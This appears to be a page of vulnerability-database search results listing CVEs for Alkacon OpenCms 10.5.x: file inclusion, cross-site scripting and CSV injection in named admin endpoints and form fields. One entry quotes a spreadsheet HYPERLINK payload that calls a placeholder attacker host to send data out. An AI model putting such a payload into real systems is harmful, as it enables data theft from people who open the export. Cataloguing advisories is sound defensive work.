468 matches found
CVE-2019-13237
In Alkacon OpenCms 10.5.4 and 10.5.5, there are multiple resources vulnerable to Local File Inclusion that allow an attacker to access server resources: clearhistory.jsp, convertxml.jsp, groupnew.jsp, loginmessage.jsp, xmlcontentrepair.jsp, and /system/workplace/admin/history/settings/index.jsp...
CVE-2019-13237
CVE-2019-13237 affects Alkacon OpenCms 10.5.4 and 10.5.5, where Local File Inclusion allows access to server resources via multiple JSP endpoints (e.g., loginmessage.jsp, xmlcontentrepair.jsp, history/index.jsp, and others). The root cause is improper access control in resources such as clearhist...
CVE-2019-13236
In system/workplace/ in Alkacon OpenCms 10.5.4 and 10.5.5, there are multiple Reflected and Stored XSS issues in the management interface...
CVE-2019-13236
Alkacon OpenCms 10.5.4 and 10.5.5 are affected by multiple Reflected and Stored XSS vulnerabilities in the system/workplace/ management interface. Root cause is not explicitly detailed beyond XSS in the provided documents. The issues could allow execution of arbitrary scripts in authenticated use...
CVE-2019-13235
In the Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, there is XSS in the Login form...
CVE-2019-13235
CVE-2019-13235 affects Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, with a Cross-Site Scripting (XSS) flaw in the login form. Public sources describe the vulnerability as an XSS in the login workflow, with PoCs showing injection potentially via headers like X-Forwarded-For. NVD metrics list...
CVE-2019-13234
CVE-2019-13234 involves XSS in the Alkacon OpenCms Apollo Template, specifically in the search engine for OpenCms Apollo Template 10.5.4 and 10.5.5. The connected documents confirm a reflected XSS vulnerability in the search endpoint (e.g., parameter q) and also show a related XSS condition in a ...
CVE-2019-13234
In the Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, there is XSS in the search engine...
OpenCMS 10.5.4 Cross Site Scripting
Description: OpenCMS v10.5.4 and before is vulnerable to cross site scripting in New User module for parameter First Name and Last Name. Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp. Payload used in PoC is...
OpenCMS 10.5.4 CSV Injection
Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New User module for parameter First Name and Last Name. Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp. Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...
Code injection
Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...
Cross site scripting
Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...
CVE-2019-11819
Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...
CVE-2019-11818
Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...
CVE-2019-11819
CVE-2019-11819 affects Alkacon OpenCMS v10.5.4 and earlier. The vulnerability is a CSV (Excel Macro) Injection in the New User module (path: /opencms/system/workplace/admin/accounts/user_new.jsp) triggered via the First Name or Last Name fields. The connected documents confirm the same issue acro...
CVE-2019-11818
CVE-2019-11818 affects Alkacon OpenCMS v10.5.4 and earlier. The stored XSS vulnerability resides in the New User module (opencms/system/workplace/admin/accounts/user_new.jsp), allowing attackers to inject arbitrary JavaScript via First Name or Last Name fields; the payload is executed when the af...